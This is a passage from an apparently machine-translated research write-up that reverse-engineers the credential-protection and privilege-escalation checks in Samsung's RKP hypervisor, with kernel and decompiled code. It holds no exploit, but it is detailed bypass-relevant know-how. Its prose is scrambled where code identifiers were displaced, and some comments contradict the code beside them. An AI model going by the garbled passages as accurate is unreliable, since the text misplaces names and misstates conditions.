    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
  // patchoat is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
  if (!strcmp(name_pa, "/system/bin/patchoat")) {
    *(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
  }
}

凭据更改¶

当内核需要更改任务的凭据时，它会调用虚拟机管理程序，虚拟机管理程序会执行一些广泛的检查以检测权限提升尝试。在深入研究虚拟机管理程序方面之前，让我们看看如何将结构分配给 .credtask_struct

cred结构从三个地方分配。第一个是copy_creds功能。除了指出凭据不再在同一线程组之间共享的注释外，我们还可以看到该函数的返回值被分配给的字段。prepare_ro_credscredtask_struct

▸ kernel/cred.c

int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
    // ...
    /*
     * Disabling cred sharing among the same thread group. This
     * is needed because we only added one back pointer in cred.
     *
     * This should NOT in any way change kernel logic, if we think about what
     * happens when a thread needs to change its credentials: it will just
     * create a new one, while all other threads in the same thread group still
     * reference the old one, whose reference counter decreases by 2.
     */
    // ...
    if(rkp_cred_enable){
        p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
        put_cred(new);
    }
    // ...
}

其次是commit_creds功能。它通过调用 rkp_ro_page 来确保新凭据受到虚拟机监控程序的保护，然后再将函数的返回值分配给当前函数。credtask_structprepare_ro_creds

▸ kernel/cred.c

int commit_creds(struct cred *new)
{    if (rkp_ro_page((unsigned long)new))
        BUG_ON((rocred_uc_read(new)) < 1);
    else
        // ...
    if(rkp_cred_enable) {
        struct cred *new_ro;
        new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);
        rcu_assign_pointer(task->real_cred, new_ro);
        rcu_assign_pointer(task->cred, new_ro);
    } 
    else {
        // ...
    }
  // ...
    if (rkp_cred_enable){
        put_cred(new);
        put_cred(new);
    }
  // ...
}

第三位是功能。再一次，我们可以看到另一个调用在将返回值分配给当前 .override_credsprepare_ro_credscredtask_struct

▸ kernel/cred.c

#define override_creds(x) rkp_override_creds(&x)
const struct cred *rkp_override_creds(struct cred **cnew)
{
    // ...
    struct cred *new = *cnew;
    // ...
    if(rkp_cred_enable) {
        volatile unsigned int rkp_use_count = rkp_get_usecount(new);
        struct cred *new_ro;        new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
        *cnew = new_ro;
        rcu_assign_pointer(current->cred, new_ro);
        put_cred(new);
    }
    else {
        // ...
    }
    // ...
}

prepare_ro_creds从缓存中分配新的只读结构。我们在“凭据保护”部分看到，此结构中添加了新字段。特别是，字段（结构的引用计数）需要经常修改。若要解决此问题，指向包含引用计数的读写结构的指针存储在只读结构中。因此，还会分配新的读写引用计数。然后，它会从 .credcred_jar_rouse_cntcredcredprepare_ro_credstask_security_structtsec_jar

它使用 rkp_cred_fill_params 宏并调用命令，让虚拟机监控程序执行其验证，并将数据从结构的读写版本（参数）复制到只读版本（新分配的版本）。它最终会进行一些健全性检查，具体取决于调用的位置，然后返回结构的只读版本。RKP_KDP_X46credprepare_ro_credscred

▸ kernel/cred.c

static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
    u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
    struct cred *new_ro;
    void *use_cnt_ptr = NULL;
    void *rcu_ptr = NULL;
    void *tsec = NULL;
    cred_param_t cred_param;
    new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
    if (!new_ro)
        panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);    use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
    if (!use_cnt_ptr)
        panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);
    rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
    ((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;
    tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
    if (!tsec)
        panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);
    rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
    uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
    if (kdp_cmd == RKP_CMD_COPY_CREDS) {
        if ((new_ro->bp_task != (void *)p) 
            || new_ro->security != tsec 
            || new_ro->use_cnt != use_cnt_ptr) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
        }
    }
    else {
        if ((new_ro->bp_task != current)||
            (current->mm 
            && new_ro->bp_pgd != (void *)pgd) ||
            (new_ro->security != tsec) ||
            (new_ro->use_cnt != use_cnt_ptr)) {
            panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
        }
    }
    rocred_uc_set(new_ro, 2);
    set_cred_subscribers(new_ro, 0);
    get_group_info(new_ro->group_info);
    get_uid(new_ro->user);
    get_user_ns(new_ro->user_ns);
#ifdef CONFIG_KEYS
    key_get(new_ro->session_keyring);
    key_get(new_ro->process_keyring);
    key_get(new_ro->thread_keyring);
    key_get(new_ro->request_key_auth);
#endif
    validate_creds(new_ro);
    return new_ro;
}

rkp_cred_fill_params宏只是填充作为 RKP 命令的参数给出的结构的字段。cred_param_t

▸ include/linux/cred.h

typedef struct cred_param{
    struct cred *cred;
    struct cred *cred_ro;
    void *use_cnt_ptr;
    void *sec_ptr;
    unsigned long type;
    union {
        void *task_ptr;
        u64 use_cnt;
    };
}cred_param_t;

▸ include/linux/cred.h

#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do {                        \
    cred_param.cred = crd;      \
    cred_param.cred_ro = crd_ro;        \
    cred_param.use_cnt_ptr = uptr;      \
    cred_param.sec_ptr= tsec;       \
    cred_param.type = rkp_cmd_type;     \
    cred_param.use_cnt = (u64)rkp_use_cnt;      \
} while(0)

在虚拟机监控程序端，命令由调用 rkp_assign_creds 的函数处理。rkp_cmd_assign_creds

rkp_assign_creds做了很多检查，可以总结如下（其中“当前”是指任务，“旧”是指读写，而“new”是指只读结构）：credcurrentcredcred

检查当前反向指针的完整性;
旧结构必须由虚拟机管理程序保护;cred
对于非“Linux on Dex”当前任务，

如果其 ID 没有 LOD 前缀且设备已锁定，则调用 rkp_check_pe 和 from_zyg_adbd 来检测权限提升;
如果其 ID 以 LOD 为前缀，则当前任务标记为CRED_FLAG_LOD;

为旧任务和当前任务的每个 UID、EUID、GID 和 EGID 对调用check_privilege_escalation，以检测权限提升;
旧的被复制到新的结构中，并设置了它的字段;credcreduse_cnt
对于非copy_creds调用方，新结构的反向指针是从当前任务设置的;cred
对于调用方，如果作为参数给出的使用计数小于或等于 1，或者否则未标记，则标记新结构;override_credscredCRED_FLAG_ORPHAN
对于copy_creds调用方，后退指针是从被复制的任务设置的;
新的必须由虚拟机管理程序保护;task_security_struct
如果 RKP 延迟初始化，则如果新 SID 大于 20，则旧 SID 不能小于 20;
旧的被复制到新的中，并相应地设置了后指针;task_security_structtask_security_struct
如果设备已锁定并标记了当前父任务，则将标记新任务。CRED_FLAG_MARK_PPTCRED_FLAG_MARK_PPT

void rkp_assign_creds(saved_regs_t* regs) {
  // ...  // Convert the VA of the argument structure to a PA.
  cred_param = rkp_get_pa(regs->x2);
  if (!cred_param) {
    uh_log('L', "rkp_kdp.c", 662, "NULL pData");
    return;
  }
  // Get the current task_struct in the kernel.
  curr_task_va = rkp_ns_get_current();
  // Convert the current task_struct VA into a PA.
  curr_task = rkp_get_pa(curr_task_va);
  // Get the current cred structure from the current task_struct.
  curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
  // Convert the current cred structure VA into a PA.
  curr_cred = rkp_get_pa(curr_cred_va);
  // Get the target RW cred from the argument structure and convert it from a VA to a PA.
  targ_cred = rkp_get_pa(cred_param->cred);
  // Get the target RO cred from the argument structure and convert it from a VA to a PA.
  targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
  // Get the current task_security_struct from the current cred structure.
  curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
  // Convert the current task_security_struct from a VA to a PA.
  curr_secptr = rkp_get_pa(curr_secptr_va);
  // Sanity-check: the current cred structure must be non NULL.
  if (!curr_cred) {
    uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
  }
  // Sanity-check: the current task_security_struct must be non NULL, or RKP must not be deferred initialized.
  if (!curr_secptr && rkp_deferred_inited) {
    uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL  %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
    return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
  }
  // Get the back-pointer (a cred structure pointer) of the current task_security_struct.
  bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
  // Get the back-pointer (a task_struct pointer) of the current cred structure.
  bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
  // Sanity-check: the back-pointers must point to the current cred structure and current task_struct respectively.
  if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
    uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1  %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
    uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
    rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
    return;
  }
  // Sanity-check: the target RW and RO cred structures must be non NULL and the target RO cred structure must be marked
  // as `CRED` in the physmap.
  if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
    uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
    return;
  }
  skip_checks = 0;
  // Get the type field (used to process marking) from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is not a "Linux on Dex" process.
  if ((curr_flags & CRED_FLAG_LOD) == 0) {
    // Get the uid, euid, gid, egid fields from the current cred structure.
    curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
    curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
    curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
    curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
    // If none of those fields have the LOD prefix (0x61a8).
    if ((curr_uid & 0xffff0000) != 0x61a80000 && (curr_euid & 0xffff0000) != 0x61a80000 &&
        (curr_gid & 0xffff0000) != 0x61a80000 && (curr_egid & 0xffff0000) != 0x61a80000) {
      // And if the device is locked.
      if (!rkp_cred->VERIFIED_BOOT_STATE) {
        // Call `rkp_check_pe` and `from_zyg_adbd` to detect instances of privilege escalation.
        if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
          uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
                 *(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
          // If either of these 2 functions returned true, call `rkp_privilege_escalation` to handle it.
          return rkp_privilege_escalation(targ_cred, cred_pa, 1);
        }
      }
      // If the device is locked, or no privilege escalation was detected, skip the next checks.
      skip_checks = 1;
    }
    // If the current task has a LOD prefixed field, mark it as `CRED_FLAG_LOD`.
    else {
      *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
    }
  }
  // If the checks are not skipped.
  if (!skip_checks) {
    // Get the uid field of the target RW cred structure.
    targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
    priv_esc = 0;
    // If the uid is not INET (3003).
    if (targ_uid != 3003) {
      // Get the uid field of the current cred structure.
      curr_uid = *(cred_pa + 4 * rkp_cred->CRED_UID_OFFSET);
      priv_esc = 0;
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_uid, curr_uid)) {
        uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
               targ_uid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the euid field of the target RW cred structure.
    targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
    // If the euid is not INET (3003).
    if (targ_euid != 3003) {
      // Get the euid field of the current cred structure.
      curr_euid = *(cred_pa + 4 * rkp_cred->CRED_EUID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_euid, curr_euid)) {
        uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
               targ_euid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the gid field of the target RW cred structure.
    targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
    // If the gid is not INET (3003).
    if (targ_gid != 3003) {
      // Get the gid field of the current cred structure.
      curr_gid = *(cred_pa + 4 * rkp_cred->CRED_GID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_gid, curr_gid)) {
        uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
               targ_gid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // Get the egid field of the target RW cred structure.
    targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
    // If the egid is not INET (3003).
    if (targ_egid != 3003) {
      // Get the egid field of the current cred structure.
      curr_egid = *(cred_pa + 4 * rkp_cred->CRED_EGID_OFFSET);
      // Call `check_privilege_escalation` to detect privilege escalation.
      if (check_privilege_escalation(targ_egid, curr_egid)) {
        uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
               targ_egid);
        // If the function returns true, privilege escalation was detected.
        priv_esc = 1;
      }
    }
    // If privilege escalation was detected on the UID, EUID, GID or EGID.
    if (priv_esc) {
      uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx  ", targ_cred);
      if (curr_task) {
        curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
        uh_log('L', "rkp_kdp.c", 707, curr_comm);
      }
      // Call `rkp_privilege_escalation` to handle it.
      return rkp_privilege_escalation(param_cred_pa, cred_pa, 1);
    }
  }
  // The checks passed, copy the RW cred into the RO cred structure.
  memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
  cmd_type = cred_param->type;
  // Set the use_cnt field of the RO cred structure.
  *(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
  // If the caller of `prepare_ro_creds` was not `copy_creds`.
  if (cmd_type != RKP_CMD_COPY_CREDS) {
    // Get the current mm_struct from the current cred structure.
    curr_mm_va = *(current_pa + 8 * rkp_cred->TASK_MM_OFFSET);
    // If the current mm_struct is not NULL.
    if (curr_mm_va) {
      curr_mm = rkp_get_pa(curr_mm_va);
      // Extract the current PGD from it.
      curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
    } else {
      // Otherwise, get it from TTBR1_EL1.
      curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xffffffffc000);
    }
    // Set the bp_pgd and bp_task fields of the RO cred structure.
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
    // If the caller of `prepare_ro_creds` is `override_creds`.
    if (cmd_type == RKP_CMD_OVRD_CREDS) {
      // If the argument structure usage counter is lower or equal to 1, unmark the target RO cred as
      // `CRED_FLAG_ORPHAN`.
      if (cred_param->use_cnt <= 1) {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
      }
      // Otherwise, mark the target RO cred as `CRED_FLAG_ORPHAN`.
      else {
        *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
      }
    }
  }
  // If the caller of `prepare_ro_creds` is `copy_creds`, set the bp_task field of the RO cred structure to the current
  // task_struct.
  else {
    *(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
  }
  // Get the new task_security_struct from the argument structure.
  newsec_ptr_va = cred_param->sec_ptr;
  // Get the target RO cred structure from the argument structure.
  targ_cred_ro_va = cred_param->cred_ro;
  // If the new task_security_struct is not NULL.
  if (newsec_ptr_va) {
    // Convert the new task_security_struct from a VA to a PA.
    newsec_ptr = rkp_get_pa(newsec_ptr_va);
    // Get the old task_security_struct from the target RW cred structure.
    oldsec_ptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
    // Convert the old task_security_struct from a VA to a PA.
    oldsec_ptr = rkp_get_pa(oldsec_ptr_va);
    // Call `chk_invalid_sec_ptr` to check if the new task_security_struct is hypervisor-protected, and ensure both the
    // old and the new task_security_struct are non NULL.
    if (chk_invalid_sec_ptr(newsec_ptr) || !oldsec_ptr || !newsec_ptr) {
      uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", newsec_ptr_va, newsec_ptr,
             oldsec_ptr);
      // Otherwise, trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", newsec_ptr_va, oldsec_ptr, newsec_ptr);
    }
    // If the old and new task_security_struct are valid.
    else {
      // Get the new sid from the new task_security_struct.
      new_sid = *(newsec_ptr + 4);
      // Get the old sid from the old task_security_struct.
      old_sid = *(oldsec_ptr + 4);
      // If RKP is deferred initialized and the SID jumps from below to above `sysctl_net` (20).
      if (rkp_deferred_inited && old_sid < 20 && new_sid > 20) {
        uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", old_sid, new_sid);
        // Trigger a policy violation.
        rkp_policy_violation("Data Protection Violation %lx %lx %lx", old_sid, new_sid, 0);
      } else {
        // Copy the old task_security_struct to the new one.
        memcpy(newsec_ptr, oldsec_ptr, rkp_cred->SP_SIZE);
        // Set the security field of the target RO cred structure to the new task_security_struct.
        *(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = newsec_ptr_va;
        // Set the bp_cred field of the new task_security_struct to the target RO cred structure.
        *(newsec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = targ_cred_ro_va;
      }
    }
  }
  // If the target task_security_struct is NULL, trigger a policy violation.
  else {
    uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
    rkp_policy_violation("Data Protection Violation", 0, 0, 0);
  }
  // If the device is unlocked, return immediately.
  if (rkp_cred->VERIFIED_BOOT_STATE) {
    return;
  }
  // Get the type field from the RO cred structure.
  targ_flags = *(targ_cred_ro + 8 * rkp_creds->CRED_FLAGS_OFFSET);
  // If the target task is not marked as `CRED_FLAG_MARK_PPT`.
  if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
    // Get the parent task_struct of the current task_struct.
    parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    parent_task = rkp_get_pa(parent_task_va);
    // Get the parent cred structure from the parent task_struct.
    parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
    // Convert the parent cred structure from a VA to a PA.
    parent_cred = rkp_get_pa(parent_cred_va);
    // Get the type field from the parent cred structure.
    parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
    // If the parent task is marked as `CRED_FLAG_MARK_PPT`.
    if ((parent_flags & CRED_FLAG_MARK_PPT) != 0) {
      // Mark the current task as `CRED_FLAG_MARK_PPT` too.
      *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
    }
  }
}

现在让我们回顾一下 rkp_assign_creds 调用的不同函数。特别是，从安全角度来看，尝试检测权限提升的功能非常有趣。

rkp_ns_get_current 函数返回内核的任务（存储在或中）。currentSP_EL0SP_EL1

uint64_t rkp_ns_get_current() {
  // SPSel, Stack Pointer Select.
  //
  // SP, bit [0]: Stack pointer to use.
  if (get_sp_sel()) {
    return get_sp_el0();
  } else {
    return get_sp_el1();
  }
}

当设备被锁定时，为非“Linux on Dex”进程调用 rkp_check_pe 函数。对于目标 RW 和当前结构的每个 UID、GID、EUID 和 EGID 对，它调用 check_pe_id 函数来确定这是否是权限提升的实例。对于有效 ID，目标 ID 也必须低于当前 ID。否则，不被视为权限提升。credcred

bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
  // ...  // Get the uid field of the current cred structure.
  curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Get the uid field of the target RW cred structure.
  targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_uid, curr_uid)) {
    return 1;
  }
  // Get the gid field of the current cred structure.
  curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Get the gid field of the target RW cred structure.
  targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_gid, curr_gid)) {
    return 1;
  }
  // Get the euid field of the current cred structure.
  curr_ueid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // Get the euid field of the target RW cred structure.
  targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // If the target euid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid)) {
    return 1;
  }
  // Get the egid field of the current cred structure.
  curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // Get the egid field of the target RW cred structure.
  targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // If the target egid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid)) {
    return 1;
  }
  return 0;
}

如果当前 ID 较大且目标 ID 小于或等于 1000 （），则返回 check_pe_id true。SYSTEM

int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  // PE is detected if the current ID is bigger and the target ID is smaller or equal to `SYSTEM` (1000).
  return curr_id > 1000 && targ_id <= 1000;
}

from_zyg_adbd 在与rkp_check_pe相同的条件下调用。如果当前任务已标记，或者它是、或的子任务，则返回 true。CRED_FLAG_CHILD_PPTzygotezygote64adbd

int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
  // ...  // Get the type field from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is marked as CRED_FLAG_CHILD_PPT, return true.
  if ((curr_flags & CRED_FLAG_CHILD_PPT) != 0) {
    return 1;
  }
  // Iterate on the parents of the current task_struct.
  task = curr_task;
  while (1) {
    // Get the pid field of the parent task_struct.
    task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
    // If the parent pid is zero, return false.
    if (!task_pid) {
      return 0;
    }
    // Get the comm field of the parent task_struct.
    task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
    // Copy the task name into a local buffer.
    memcpy(comm, task_comm, sizeof(comm));
    // If the parent task is zygote, zygote64 or adbd, return true.
    if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd")) {
      return 1;
    }
    // Get the parent field of the parent task_struct.
    parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    task = parent_pa = rkp_get_pa(parent_va);
  }
}

对于目标 RW 和当前结构的每个 UID、EUID、GID 和 EGID 对，都需要check_privilege_escalation。如果当前 ID 以 LOD 为前缀（0x61a8xxxx），并且目标 ID 不等于 -1，则返回 true。credcred

bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
  // PE is detected if the current ID is LOD prefixed but the target ID is not, and the target ID is not -1.
  return ((curr_id - 0x61a80000) <= 0xffff && (targ_id - 0x61a80000) > 0xffff && targ_id != -1);
}

当在 rkp_assign_creds 中检测到权限提升时，将调用rkp_privilege_escalation。它只会触发违反策略。

int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
  uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}

调用 chk_invalid_sec_ptr 函数来验证 new 是否有效（在结构大小上对齐）和受虚拟机管理程序保护（标记为在 physmap 中）。task_security_structSEC_PTR

int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
  rkp_phys_map_lock(sec_ptr);
  // The start and end addresses of the task_security_struct must be marked as `SEC_PTR` on the physmap, and it must
  // also be aligned on the size of this structure.
  if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
      sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
    uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
           sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
    rkp_phys_map_unlock(sec_ptr);
    return 1;
  }
  rkp_phys_map_unlock(sec_ptr);
  return 0;
}

SELinux 初始化¶

除了保护任务，并使和全局变量为只读外，三星 RKP 还保护 .此全局变量指示 SELinux 是否已初始化，在之前的 RKP 绕过中是目标。为了在加载策略后设置此变量，内核会在函数中调用虚拟机监控程序。此函数调用命令。task_security_structselinux_enforcingselinux_enabledss_initializedsecurity_load_policyRKP_KDP_X60

▸ security/selinux/ss/services.c

int security_load_policy(void *data, size_t len)
{
    // ...
        uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
    // ...
}

在虚拟机监控程序端，此命令由调用 rkp_selinux_initialized 的函数处理。此函数确保位于内核的部分中，并且内核在执行写入之前将其设置为 1。rkp_cmd_selinux_initializedss_initializedrodata

void rkp_selinux_initialized(saved_regs_t* regs) {
  // ...  // Get the VA of `ss_initialized` from register x2.
  ss_initialized_va = regs->x2;
  // Get the value to set it to from register x3.
  value = regs->x3;
  // Convert the VA of `ss_initialized` to a PA.
  ss_initialized = rkp_get_pa(ss_initialized_va);
  if (ss_initialized) {
    // Ensure the `ss_initialized` is located in the kernel rodata section.
    if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
      // Trigger a policy violation if it isn't.
      rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
    }
    // Ensure it is located at the same address that was set in `rkp_cred_init` and provided by the kernel in
    // `kdp_init`.
    else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
      // The global variable can only be set to 1, never to any other value.
      if (value == 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_3ba4a93d");
      }
    }
    // Not sure what this is about. SELINUX is the PA of the selinux field of the rkp_init_t structure located on the
    // stack of the kernel function `kdp_init`. Maybe this is here to support older or future kernel versions?
    else if (ss_initialized == rkp_cred->SELINUX) {
      // This global variable can only be changed from any value but 1 to 1.
      if (value == 1 || *ss_initialized != 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_cef38ae5");
      }
    }
    // Trigger a policy violation if the address is unexpected.
    else {
      rkp_policy_violation("RKP_ced87e02");
    }
  } else {
    uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
  }
}

挂载命名空间保护¶

虚拟机管理程序提供的最后一个功能是保护挂载命名空间（一组对进程可见的文件系统挂载）。

内核结构¶

